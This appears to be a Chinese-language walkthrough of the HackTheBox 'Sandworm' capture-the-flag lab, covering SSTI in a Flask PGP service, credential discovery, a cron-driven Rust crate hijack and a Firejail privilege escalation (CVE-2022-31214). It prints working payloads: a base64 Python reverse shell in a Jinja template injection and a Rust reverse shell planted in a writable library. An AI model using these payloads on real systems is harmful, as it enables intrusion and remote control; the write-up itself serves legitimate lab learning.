HackTheBox - Medium - Linux - Sandworm （我的创作纪念日

Sandworm

Sandworm 是一台中等难度的 Linux 机器，它托管了一个具有“PGP”验证服务的 Web 应用程序，该服务容易受到服务器端模板注入 （SSTI） 的攻击，导致“Firejail”监狱内的远程代码执行 （RCE）。可以在监狱中发现明文凭据，这会导致作为计算机用户之一对计算机进行“SSH”访问。从那里，发现了一个 cronjob，它编译并运行一个“Rust”二进制文件。该程序依赖于一个自定义的外部日志记录箱，用户对该箱具有写入权限，然后使用该箱作为运行 cronjob 的“atlas”用户获取 shell。最后，最近的“Firejail”漏洞（“CVE-2022-31214”）用于创建一个沙盒，攻击者可以在其中运行“su”命令并在目标系统上获取“root”shell。

---

外部信息收集

端口扫描

循例nmap

Web枚举

访问80跳转到ssa.htb

我看到网站底部有一个熟悉的flask

在contact有一个表单，用于提交pgp加密的消息，它似乎会回复我们，接着看

在/guide是一个pgp加解密器

/pgp给了我们public key

将公钥保存到本地

将公钥导入

再用gpg利用公钥加密我们自定义的消息

已经知道是flask了，所以应该考虑ssti，通过decrypt尝试ssti发现不行

SSTI

验证签名处，我们可以生成key然后使用公钥解密签名，在生成key的时候嵌入ssti payload

然后再使用这个公钥对消息进行签名

将公钥导出

将公钥和签名提交到网站

它payload成功被执行了

hacktricks随便来个ssti payload

{{ cycler.__init__.__globals__.os.popen('id').read() }}

来个python3 reverse shell payload，base64一下

最终ssti payload

{{ cycler.__init__.__globals__.os.popen('echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE4Iiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9iYXNoIikn | base64 -d | bash').read() }}

nc监听，它如期而至

但这个shell似乎有点问题，无法回车，我们只需要升级一下这个shell

ctrl + z
stty raw -echo;fg

但这个shell是受限制的，能做的事情很有限

本地横向移动 -> silentobserver

在家目录的.config目录下的httpie/里面我们能够找到一个admin.json文件

atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ cat ./admin.json
{
	"__meta__": {
		"about": "HTTPie session file",
		"help": "https://httpie.io/docs#sessions",
		"httpie": "2.6.0"
	},
	"auth": {
		"password": "quietLiketheWind22",
		"type": null,
		"username": "silentobserver"
	},
	"cookies": {
		"session": {
			"expires": null,
			"path": "/",
			"secure": false,
			"value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
		}
	},
	"headers": {
		"Accept": "application/json, */*;q=0.5"
	}
}

这组凭据能够直接登录ssh，同时拿到user flag

获得不受限制的shell -> atlas

传个pspy过去

2023/12/21 08:26:01 CMD: UID=0     PID=3784   | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/12/21 08:26:01 CMD: UID=0     PID=3783   | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/12/21 08:26:01 CMD: UID=1000  PID=3786   | /usr/bin/cargo run --offline 
2023/12/21 08:26:01 CMD: UID=1000  PID=3787   | /usr/bin/cargo run --offline 
2023/12/21 08:26:01 CMD: UID=1000  PID=3788   | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed 
2023/12/21 08:26:01 CMD: UID=1000  PID=3790   | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro --print=sysroot --print=cfg 
2023/12/21 08:26:01 CMD: UID=1000  PID=3792   | /usr/bin/cargo run --offline 
2023/12/21 08:26:11 CMD: UID=0     PID=3796   | /bin/bash /root/Cleanup/clean_c.sh 
2023/12/21 08:26:11 CMD: UID=0     PID=3797   | /bin/rm -r /opt/crates 
2023/12/21 08:26:11 CMD: UID=0     PID=3798   | /bin/bash /root/Cleanup/clean_c.sh 
2023/12/21 08:26:11 CMD: UID=0     PID=3799   | /usr/bin/chmod u+s /opt/tipnet/target/debug/tipnet 
2023/12/21 08:28:01 CMD: UID=0     PID=3807   | /usr/sbin/CRON -f -P 
2023/12/21 08:28:01 CMD: UID=0     PID=3806   | /usr/sbin/CRON -f -P 
2023/12/21 08:28:01 CMD: UID=0     PID=3808   | /usr/sbin/CRON -f -P 
2023/12/21 08:28:01 CMD: UID=0     PID=3809   | sleep 10 
2023/12/21 08:28:01 CMD: UID=0     PID=3812   | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/12/21 08:28:01 CMD: UID=0     PID=3810   | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/12/21 08:28:01 CMD: UID=0     PID=3813   | /bin/sudo -u atlas /usr/bin/cargo run --offline 
2023/12/21 08:28:01 CMD: UID=1000  PID=3814   | rustc -vV 
2023/12/21 08:28:01 CMD: UID=1000  PID=3815   | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro -Csplit-debuginfo=packed 
2023/12/21 08:28:01 CMD: UID=1000  PID=3817   | rustc - --crate-name ___ --print=file-names --crate-type bin --crate-type rlib --crate-type dylib --crate-type cdylib --crate-type staticlib --crate-type proc-macro --print=sysroot --print=cfg 
2023/12/21 08:28:02 CMD: UID=1000  PID=3819   | rustc -vV 
2023/12/21 08:28:11 CMD: UID=0     PID=3823   | /bin/bash /root/Cleanup/clean_c.sh 
2023/12/21 08:28:11 CMD: UID=0     PID=3824   | 
2023/12/21 08:28:11 CMD: UID=0     PID=3825   | /bin/bash /root/Cleanup/clean_c.sh 
2023/12/21 08:28:11 CMD: UID=0     PID=3826   | /bin/bash /root/Cleanup/clean_c.sh 
2023/12/21 08:30:01 CMD: UID=0     PID=3833   | /usr/sbin/CRON -f -P 

在/opt下我们可以找到它们

我们无权修改main.rs，但是通过cargo.toml发现它调用的logger模块是在/opt/crates下的

lib.rs可写

将rust reverse shell payload拿下来改一改

use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn main() {
	let s = TcpStream::connect("10.0.0.1:4242").unwrap();
	let fd = s.as_raw_fd();
	Command::new("/bin/sh")
		.arg("-i")
		.stdin(unsafe { Stdio::from_raw_fd(fd) })
		.stdout(unsafe { Stdio::from_raw_fd(fd) })
		.stderr(unsafe { Stdio::from_raw_fd(fd) })
		.spawn()
		.unwrap()
		.wait()
		.unwrap();
}

把shellcode改到lib.rs的log函数中，当main那边调用log函数时，我们的nc应该会收到shell

本地权限提升 - CVE-2022-31214

我们在atlas的不受限制的shell中发现了一个新的组，查找一下有关该组的目录和文件

don’t upgrade

升级一下shell

但是我发现使用pty之后，shell似乎又变得受限了，所以重新获取了一次shell

可以看到firejail版本是0.9.68，并且还有root的suid

在谷歌搜索版本相关的漏洞能够找到一篇文章

这个cve能够帮助我们利用其来进行权限提升，并且还提供了exp

先通过常规操作向atlas用户写入ssh key，然后通过ssh登录，签名的reverse shell先不要关

运行exp

在另一个atlas的shell下执行firejail --join

root flag在老地方